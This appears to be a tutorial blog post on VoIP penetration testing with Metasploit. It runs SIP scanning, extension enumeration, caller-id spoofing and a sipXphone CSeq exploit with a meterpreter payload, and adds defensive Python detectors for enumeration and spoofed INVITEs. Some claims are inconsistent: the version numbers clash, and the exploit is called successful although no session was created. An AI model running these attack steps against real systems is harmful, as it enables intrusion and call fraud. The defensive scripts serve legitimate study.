Introduction
This article gives a brief introduction to penetration testing and privilege escalation against VoIP services with Metasploit. The target program is SipXphone Version 2.0.6.27.
1. Footprinting the VoIP service
Scan with Metasploit's built-in SIP scanner module:
msf6 > use auxiliary/scanner/sip/options
msf6 auxiliary(scanner/sip/options) > options

Module options (auxiliary/scanner/sip/options):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      5060             yes       The target port (UDP)
   THREADS    10               yes       The number of concurrent threads
   TO         nobody           no        The destination username to probe at each host

msf6 auxiliary(scanner/sip/options) > set rhosts 192.168.1.1/24
rhosts => 192.168.1.1/24
msf6 auxiliary(scanner/sip/options) > run
[*] Sending SIP UDP OPTIONS requests to 192.168.1.0->192.168.1.255 (256 hosts)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
Once a VoIP service has been found, use the enumerator module to scan it further (unfortunately, I have no VoIP service nearby):
msf6 > use auxiliary/scanner/sip/enumerator
msf6 auxiliary(scanner/sip/enumerator) > options

Module options (auxiliary/scanner/sip/enumerator):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   CHOST                       no        The local client address
   CPORT      5060             no        The local client port
   MAXEXT     9999             yes       Ending extension
   METHOD     REGISTER         yes       Enumeration method (Accepted: OPTIONS, REGISTER)
   MINEXT     0                yes       Starting extension
   PADLEN     4                yes       Cero padding maximum length
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      5060             yes       The target port
   THREADS    1                yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/sip/enumerator) > set maxext 9999   # last extension number to try
maxext => 9999
msf6 auxiliary(scanner/sip/enumerator) > set minext 0      # first extension number to try
minext => 0
msf6 auxiliary(scanner/sip/enumerator) > set rhosts 192.168.1.1/24
rhosts => 192.168.1.1/24
msf6 auxiliary(scanner/sip/enumerator) > run
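From the PBX side, the two scans above leave a recognisable trace: the options scanner sends OPTIONS with the default To user "nobody", and the enumerator sends one REGISTER per extension from MINEXT to MAXEXT, so a single source address produces a burst of REGISTER requests to many consecutive extensions that all fail with 401/404. The following script is an added example, not part of the original post or of Metasploit: it reads a hypothetical PBX log format (one request per line, with constructed field names and constructed sample lines) and flags sources that probe many distinct extensions within a short window without ever completing a registration.

```python
"""Detect SIP OPTIONS sweeps and REGISTER extension enumeration in PBX logs.

Added example, not part of the original post or of Metasploit. It assumes a
hypothetical log format with one SIP request per line:
    <ISO timestamp> src=<ip> method=<SIP method> to=<extension> status=<code>
Field names and the sample lines below are constructed for this demo.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>[\d.]+) method=(?P<method>[A-Z]+) "
    r"to=(?P<to>\S+) status=(?P<status>\d{3})$"
)

# Constructed sample: one host sweeps extensions 0000.. in a few seconds
# (the pattern MINEXT/MAXEXT/PADLEN produce), while a legitimate phone at
# 192.168.1.50 registers and places a call.
SAMPLE_LOG = """\
2024-05-01T10:00:00 src=192.168.1.113 method=OPTIONS to=nobody status=200
2024-05-01T10:00:01 src=192.168.1.113 method=REGISTER to=0000 status=404
2024-05-01T10:00:01 src=192.168.1.113 method=REGISTER to=0001 status=404
2024-05-01T10:00:01 src=192.168.1.113 method=REGISTER to=0002 status=404
2024-05-01T10:00:02 src=192.168.1.113 method=REGISTER to=0003 status=404
2024-05-01T10:00:02 src=192.168.1.113 method=REGISTER to=0004 status=404
2024-05-01T10:00:02 src=192.168.1.113 method=REGISTER to=1001 status=401
2024-05-01T10:00:03 src=192.168.1.113 method=REGISTER to=0006 status=404
2024-05-01T10:00:03 src=192.168.1.113 method=REGISTER to=0007 status=404
2024-05-01T10:00:05 src=192.168.1.50 method=REGISTER to=1001 status=200
2024-05-01T10:00:40 src=192.168.1.50 method=INVITE to=1002 status=200
"""


def parse_log(text):
    """Parse log lines into dicts; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        ev = m.groupdict()
        ev["ts"] = datetime.fromisoformat(ev["ts"])
        events.append(ev)
    return events


def find_enumeration(events, window=timedelta(seconds=30), min_distinct=5):
    """Return {src: sorted extensions} for every source that sent OPTIONS or
    REGISTER to at least `min_distinct` different extensions inside `window`
    without a single REGISTER succeeding (a phone that really belongs on the
    PBX completes a registration; a sweep only collects 401/404 answers)."""
    probes = defaultdict(list)
    for ev in events:
        if ev["method"] in ("REGISTER", "OPTIONS"):
            probes[ev["src"]].append(ev)
    alerts = {}
    for src, evs in probes.items():
        evs.sort(key=lambda e: e["ts"])
        # Sliding window starting at each probe from this source.
        for i, first in enumerate(evs):
            seen = set()
            registered = False
            for ev in evs[i:]:
                if ev["ts"] - first["ts"] > window:
                    break
                seen.add(ev["to"])
                if ev["method"] == "REGISTER" and ev["status"] == "200":
                    registered = True
            if not registered and len(seen) >= min_distinct:
                alerts[src] = sorted(seen)
                break
    return alerts


if __name__ == "__main__":
    for src, exts in find_enumeration(parse_log(SAMPLE_LOG)).items():
        print("possible extension enumeration from %s: %d extensions probed (%s ...)"
              % (src, len(exts), ", ".join(exts[:4])))
```

The window and threshold are policy knobs: a phone that re-registers every minute never touches more than its own extension, so even a low `min_distinct` produces few false positives, while an enumerator walking 0000 to 9999 exceeds any sensible threshold within its first second.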
2. Spoofed VoIP calls
msf6 > use auxiliary/voip/sip_invite_spoof
msf6 auxiliary(voip/sip_invite_spoof) > options

Module options (auxiliary/voip/sip_invite_spoof):

   Name       Current Setting         Required  Description
   ----       ---------------         --------  -----------
   DOMAIN                             no        Use a specific SIP domain
   EXTENSION                          no        The specific extension or name to target
   MSG        The Metasploit has you  yes       The spoofed caller id to send
   RPORT      5060                    yes       The target port (UDP)
   SRCADDR    192.168.1.1             yes       The sip address the spoofed call is coming from
   THREADS    1                       yes       The number of concurrent threads (max one per host)

msf6 auxiliary(voip/sip_invite_spoof) > set rhosts 192.168.1.106
rhosts => 192.168.1.106
msf6 auxiliary(voip/sip_invite_spoof) > run
[*] Sending Fake SIP Invite to: 192.168.1.106
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
3. Exploiting VoIP
Tools that can be used to attack VoIP services:
Smap
Sipscan
Sipsak
Voipong
Svmap
This article assumes the target program is SipXphone Version 2.0.6.27.
msf6 > use exploit/windows/sip/sipxphone_cseq
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/sip/sipxphone_cseq) > options

Module options (exploit/windows/sip/sipxphone_cseq):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   5060             yes       The target port (UDP)

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   SIPfoundry sipXphone 2.6.0.27 Universal

msf6 exploit(windows/sip/sipxphone_cseq) > set rhosts 192.168.1.106
rhosts => 192.168.1.106
msf6 exploit(windows/sip/sipxphone_cseq) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/sip/sipxphone_cseq) > exploit
[*] Trying target SIPfoundry sipXphone 2.6.0.27 Universal...
[*] Started bind TCP handler against 192.168.1.106:4444
[*] Exploit completed, but no session was created.
Because I have no VoIP service, the attack succeeded but no session was created.
Summary
This article briefly introduced penetration testing and privilege escalation against VoIP services with Metasploit. Since no live instance was available, only the method could be shown; it is provided for study purposes only.
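Sections 2 and 3 both rest on the fact that a SIP endpoint accepts whatever an unauthenticated UDP packet claims: the spoofed INVITE carries an arbitrary caller id (MSG) and source address (SRCADDR), and the exploit module's name points at the CSeq header as the field it abuses. The script below is an added example, not part of the original post, of Metasploit, or of sipXphone: a minimal SIP request parser with two checks a proxy or session border controller in front of the phones could apply. The first rejects structurally invalid requests (a CSeq that is not "digits SP Method" as RFC 3261 defines it, or any header value over a length cap; `MAX_HEADER_LEN` is an assumed policy value, not a limit from any standard). The second compares the From user of an INVITE against a constructed registration table and the packet's real source IP, which catches an INVITE claiming to come from an extension that registered elsewhere. The registration table and the two sample INVITEs are constructed for this demo.

```python
"""Check inbound SIP INVITEs for caller-id spoofing and malformed headers.

Added example, not part of the original post, of Metasploit, or of sipXphone.
Assumptions: REGISTRATIONS is a constructed table of who registered from
where, and MAX_HEADER_LEN is an arbitrary policy cap, not an RFC limit.
"""
import re

MAX_HEADER_LEN = 256                       # assumed policy cap per header value
CSEQ_RE = re.compile(r"^\d{1,10} [A-Z]+$")  # RFC 3261: CSeq = 1*DIGIT LWS Method
URI_RE = re.compile(r"sip:(?P<user>[^@>;]+)@(?P<host>[^>;]+)")

# Constructed registration table: extension -> IP address it registered from.
REGISTRATIONS = {"1001": "192.168.1.50", "1002": "192.168.1.51"}


def parse_request(raw):
    """Split a SIP request into (method, request-uri, headers).
    Header names are lower-cased; a repeated header keeps its last value."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or parts[2] != "SIP/2.0":
        raise ValueError("malformed request line: %r" % lines[0])
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError("malformed header line: %r" % line)
        headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], headers


def check_invite(raw, src_ip):
    """Return a list of findings for one request received from src_ip.
    An empty list means the request passed both checks."""
    findings = []
    method, _uri, h = parse_request(raw)
    # Check 1: structural sanity of every header, before any call logic runs.
    for name, value in h.items():
        if len(value) > MAX_HEADER_LEN:
            findings.append("oversized header %s (%d bytes)" % (name, len(value)))
    if not CSEQ_RE.match(h.get("cseq", "")):
        findings.append("malformed CSeq: %r" % h.get("cseq"))
    if method != "INVITE":
        return findings
    # Check 2: does the claimed caller match a known registration, and did
    # the packet arrive from the address that registration was made from?
    m = URI_RE.search(h.get("from", ""))
    if not m:
        findings.append("From header without a sip: URI")
        return findings
    user = m.group("user")
    registered_ip = REGISTRATIONS.get(user)
    if registered_ip is None:
        findings.append("INVITE from unregistered caller %r" % user)
    elif registered_ip != src_ip:
        findings.append("caller %r registered from %s but INVITE came from %s"
                        % (user, registered_ip, src_ip))
    return findings


# Constructed: a legitimate call from the phone that owns extension 1001.
GOOD_INVITE = (
    "INVITE sip:1002@192.168.1.106 SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.168.1.50:5060;branch=z9hG4bK-1\r\n"
    "From: \"Alice\" <sip:1001@192.168.1.106>;tag=a1\r\n"
    "To: <sip:1002@192.168.1.106>\r\n"
    "Call-ID: c1@192.168.1.50\r\n"
    "CSeq: 1 INVITE\r\n"
    "Content-Length: 0\r\n\r\n"
)

# Constructed: a caller id chosen by the sender, claiming extension 1001,
# arriving from an address that never registered that extension.
SPOOFED_INVITE = (
    "INVITE sip:1002@192.168.1.106 SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.168.1.113:5060;branch=z9hG4bK-2\r\n"
    "From: \"The Metasploit has you\" <sip:1001@192.168.1.1>;tag=b2\r\n"
    "To: <sip:1002@192.168.1.106>\r\n"
    "Call-ID: c2@192.168.1.113\r\n"
    "CSeq: 1 INVITE\r\n"
    "Content-Length: 0\r\n\r\n"
)

# Constructed: same legitimate call with a CSeq that violates the grammar.
BAD_CSEQ_INVITE = GOOD_INVITE.replace("CSeq: 1 INVITE", "CSeq: 1 invite")

if __name__ == "__main__":
    for label, msg, ip in (("good", GOOD_INVITE, "192.168.1.50"),
                           ("spoofed", SPOOFED_INVITE, "192.168.1.113"),
                           ("bad cseq", BAD_CSEQ_INVITE, "192.168.1.50")):
        print(label, "->", check_invite(msg, ip) or "ok")
```

Structural validation runs first on purpose: a message that fails the grammar is dropped before any code tries to interpret its fields, which is the cheapest protection an intermediary can offer to phones whose own parser cannot be patched. The registration check is a heuristic, not proof of identity; SIP digest authentication on INVITE, where the phones and PBX support it, is the proper fix for caller-id spoofing.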